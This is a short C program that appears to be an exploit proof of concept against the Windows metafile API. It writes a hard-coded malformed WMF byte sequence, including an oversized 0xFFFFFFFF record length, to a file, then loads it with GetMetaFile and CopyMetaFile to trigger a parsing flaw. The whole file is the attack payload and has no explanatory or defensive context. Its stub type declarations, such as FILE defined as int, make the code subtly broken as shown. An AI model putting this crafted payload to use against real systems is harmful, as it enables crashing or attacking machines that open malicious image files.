
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int wmf ;
typedef int HMETAFILE ;
typedef int FILE ;


 int CopyMetaFile (int ,int *) ;
 int GetMetaFile (char*) ;
 char* WMF_FILE ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fputc (char,int *) ;
 int printf (char*,char*) ;
 int usage () ;

int main()
{

 FILE *fp;

 char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00" "\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02" "\x32\x00\x96\x00\x03\x00\x00\x00\x00\x00";


 int i;

 HMETAFILE srcMeta;

    usage();

 if ((fp = fopen(WMF_FILE, "w")) == ((void*)0)) {
                printf("File %s write error\n", WMF_FILE);
                return 0;
 }

 for(i=0; i<sizeof(wmf)-1; i++)
  fputc(wmf[i], fp);

 fclose(fp);

    srcMeta = GetMetaFile(WMF_FILE);
    CopyMetaFile( srcMeta, ((void*)0));

    return 0;
}
